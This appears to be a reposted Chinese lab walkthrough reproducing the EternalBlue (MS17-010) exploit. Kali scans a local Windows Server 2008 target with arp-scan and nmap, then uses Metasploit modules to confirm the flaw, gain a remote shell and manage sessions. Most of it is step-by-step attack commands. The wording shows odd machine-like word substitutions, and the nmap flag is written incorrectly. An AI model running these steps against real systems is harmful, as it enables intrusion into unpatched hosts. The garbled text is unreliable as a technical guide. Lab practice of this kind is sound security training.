永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010)环境
信息网络
先扫描目标靶机IP
进入MSF检察是否存在永恒之蓝的漏洞
攻击
永恒之蓝漏洞复现(ms17-010)
环境
攻击机:kali
靶机:Windows Server 2008
信息网络
对ip举行网络开放什么端口
先扫描目标靶机IP
由于在同一个内网之中
所以可以使用arp-scan -l 举行查询
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350230-805746087.png
知道目标靶机IP(192.168.162.146)来举行更进一步的信息网络
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350368-1369061368.png
nmap -sV -P- 192.168.162.146
使用nmap举行192.168.162.146IP下的全端口扫描
这里可以看出体系信息为Windows Server 2008
进入MSF检察是否存在永恒之蓝的漏洞
msfconsole
#征采模块
search ms17-010
#使用模块
use 3
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350628-1653017303.png
show options
检察选项
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350526-291403709.png
set RHOSTS 192.168.162.146
设置目标IP
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349967-728349125.png
存在永恒之蓝的漏洞
返回
攻击
使用攻击模块
search ms17-010
use 0
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350523-729850035.png
set RHOSTS 192.168.162.146
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349705-2069405913.png
攻击成功
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349869-654061827.png
输入shell
进入cmd模式
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349881-1652999895.png
exit 退出shell
background 把shell放入背景
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092349746-1307778650.png
重新连接
sessions -i 1
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322092350072-838249294.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]